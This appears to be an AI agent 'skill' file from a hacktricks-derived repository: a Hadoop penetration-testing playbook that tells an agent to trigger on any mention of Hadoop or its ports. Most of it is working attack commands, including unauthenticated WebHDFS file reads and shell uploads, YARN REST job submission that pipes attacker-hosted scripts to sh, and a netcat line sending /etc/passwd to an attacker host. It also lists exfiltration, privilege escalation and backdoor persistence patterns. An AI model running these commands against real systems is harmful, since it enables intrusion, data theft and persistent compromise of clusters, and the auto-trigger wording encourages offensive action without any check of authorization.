Hacktricks-skills hadoop-pentest

How to enumerate and exploit Apache Hadoop clusters during penetration testing. Use this skill whenever you need to assess Hadoop security, test HDFS/WebHDFS access, exploit YARN RCE vulnerabilities, or check for CVE-2023-26031. Trigger on any mention of Hadoop, HDFS, YARN, MapReduce, distributed data processing security, or when you see ports 50030, 50060, 50070, 50075, 50090, 8088, 8042, 8031, 8032, 9870, 9864, or 14000 in a pentest engagement.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/50030-50060-50070-50075-50090-pentesting-hadoop/SKILL.MD
source content

Hadoop Pentesting Skill

This skill helps you enumerate and exploit Apache Hadoop clusters during penetration testing. Hadoop is an open-source framework for distributed storage and processing of large datasets across computer clusters.

Quick Reference: Hadoop Ports

PortServiceNotes
50030JobTrackerLegacy MapReduce
50060TaskTrackerLegacy MapReduce
50070 / 9870NameNode (WebHDFS)Primary target for file operations
50075 / 9864DataNodeBlock storage
50090Secondary NameNodeMetadata backup
8088YARN ResourceManagerREST API & web UI - RCE target
8042YARN NodeManagerContainer management
8031/8032YARN RPCOften unauthenticated
14000HttpFSAlternative WebHDFS gateway

Step 1: Enumerate Hadoop Services

Start by identifying which Hadoop services are exposed. Use Nmap with the built-in Hadoop scripts:

# Full Hadoop enumeration
nmap -p 50030,50060,50070,50075,50090,8088,8042,8031,8032,9870,9864,14000 \
  --script hadoop-jobtracker-info,hadoop-tasktracker-info,hadoop-namenode-info,\
  hadoop-datanode-info,hadoop-secondary-namenode-info \
  <target>

# Or use the bundled script
./scripts/enumerate-hadoop.sh <target>

Key insight: Hadoop operates without authentication in its default setup. This is your primary attack vector.

Step 2: Exploit WebHDFS (Port 50070/9870/14000)

When

security=off
, you can impersonate any user with the
user.name
parameter. This is the most common misconfiguration.

List HDFS directories

# List root directory
curl "http://<host>:50070/webhdfs/v1/?op=LISTSTATUS&user.name=hdfs"

# List specific path
curl "http://<host>:50070/webhdfs/v1/user/<username>/?op=LISTSTATUS&user.name=hdfs"

Read arbitrary files from HDFS

# Read configuration files
curl -L "http://<host>:50070/webhdfs/v1/etc/hadoop/core-site.xml?op=OPEN&user.name=hdfs"
curl -L "http://<host>:50070/webhdfs/v1/etc/hadoop/hdfs-site.xml?op=OPEN&user.name=hdfs"
curl -L "http://<host>:50070/webhdfs/v1/etc/hadoop/yarn-site.xml?op=OPEN&user.name=hdfs"

# Read user data
curl -L "http://<host>:50070/webhdfs/v1/user/<username>/data.csv?op=OPEN&user.name=hdfs"

Upload payloads

# Upload a web shell or binary
curl -X PUT -T ./payload.sh \
  "http://<host>:50070/webhdfs/v1/tmp/payload.sh?op=CREATE&overwrite=true&user.name=hdfs" \
  -H 'Content-Type: application/octet-stream'

# Upload an executable
curl -X PUT -T ./reverse_shell \
  "http://<host>:50070/webhdfs/v1/tmp/reverse_shell?op=CREATE&overwrite=true&user.name=hdfs" \
  -H 'Content-Type: application/octet-stream'

Use the bundled script for common WebHDFS operations:

./scripts/webhdfs-abuse.sh <host> <port> <operation> <path>

Operations:

list
,
read
,
upload
,
download

Step 3: Exploit YARN Unauthenticated RCE (Port 8088)

The ResourceManager REST API accepts job submissions with no authentication in default "simple" mode. This allows arbitrary command execution without needing HDFS write access.

Method 1: DistributedShell (Recommended)

# 1) Get an application ID
APP_ID=$(curl -s -X POST http://<host>:8088/ws/v1/cluster/apps/new-application | \
  jq -r '.application-id')

# 2) Submit a job with your command
curl -s -X POST http://<host>:8088/ws/v1/cluster/apps \
  -H 'Content-Type: application/json' \
  -d '{
    "application-id":"'"$APP_ID"'",
    "application-name":"pwn",
    "am-container-spec":{
      "commands":{"command":"/bin/bash -c \"curl http://<attacker>/p.sh|sh\""}
    },
    "application-type":"YARN"
  }'

Method 2: Using the bundled script

./scripts/yarn-rce.sh <host> <command>

# Examples:
./scripts/yarn-rce.sh 10.0.0.5 "whoami"
./scripts/yarn-rce.sh 10.0.0.5 "curl http://attacker/reverse.sh|sh"
./scripts/yarn-rce.sh 10.0.0.5 "cat /etc/passwd | nc attacker 4444"

Method 3: YARN RPC (Ports 8031/8032)

If these ports are exposed, older clusters allow job submission over protobuf without authentication. Treat these as RCE vectors as well.

Step 4: Check for CVE-2023-26031 (Local PrivEsc)

Hadoop 3.3.1–3.3.4 container-executor loads libraries from a relative RUNPATH. If you can run YARN containers (including via remote submission on insecure clusters), you may drop a malicious

libcrypto.so
in a writable path and get root when container-executor runs with SUID.

Check for vulnerability

# Check RUNPATH configuration
readelf -d /opt/hadoop/bin/container-executor | grep 'RUNPATH\|RPATH'
# Vulnerable if it contains $ORIGIN/:../lib/native/

# Check SUID bit
ls -l /opt/hadoop/bin/container-executor
# SUID+root makes it exploitable

# Check Hadoop version
hadoop version
# Vulnerable: 3.3.1, 3.3.2, 3.3.3, 3.3.4
# Fixed: 3.3.5+

Use the bundled check script

./scripts/check-cve-2023-26031.sh

This script will:

  1. Check if container-executor exists
  2. Verify SUID bit is set
  3. Check RUNPATH for vulnerable configuration
  4. Report Hadoop version
  5. Provide exploitation guidance if vulnerable

Step 5: Kerberos Authentication Bypass

If Kerberos is enabled, you can still attempt authentication with valid tickets:

# Use existing Kerberos ticket
curl --negotiate -u : "http://<host>:50070/webhdfs/v1/?op=LISTSTATUS"

# Or with specific ticket
curl --negotiate -u : -H "Authorization: Negotiate <ticket>" \
  "http://<host>:50070/webhdfs/v1/?op=LISTSTATUS"

Common Attack Patterns

Pattern 1: Full Cluster Compromise

  1. Enumerate with Nmap
  2. Read HDFS configuration files to understand cluster topology
  3. Upload reverse shell to
    /tmp/
    via WebHDFS
  4. Submit YARN job to execute the shell
  5. Check for CVE-2023-26031 for privilege escalation
  6. Pivot to other nodes using discovered credentials

Pattern 2: Data Exfiltration

  1. Enumerate HDFS directories
  2. Identify sensitive data paths (user data, configs, credentials)
  3. Download files via WebHDFS
    op=OPEN
  4. For large files, use
    op=GETCONTENT
    with range headers

Pattern 3: Persistence

  1. Upload malicious scripts to HDFS
  2. Create YARN jobs that run periodically
  3. Modify Hadoop configuration if write access allows
  4. Install backdoors in container-executor if CVE-2023-26031 is present

Important Notes

  • Default configuration is insecure: Hadoop ships with
    security=off
    by default
  • No Metasploit support: Use Nmap scripts and manual exploitation
  • Kerberos is optional: Many deployments never enable it
  • YARN RPC ports are often forgotten: Check 8031/8032 even if 8088 is filtered
  • CVE-2023-26031 is critical: If you have YARN access, always check for this

References

Scripts

This skill includes the following helper scripts in

scripts/
:

  • enumerate-hadoop.sh
    - Nmap-based Hadoop service enumeration
  • webhdfs-abuse.sh
    - WebHDFS operations (list, read, upload, download)
  • yarn-rce.sh
    - YARN RCE exploitation via DistributedShell
  • check-cve-2023-26031.sh
    - CVE-2023-26031 vulnerability check

Run

./scripts/<script-name>.sh --help
for usage details.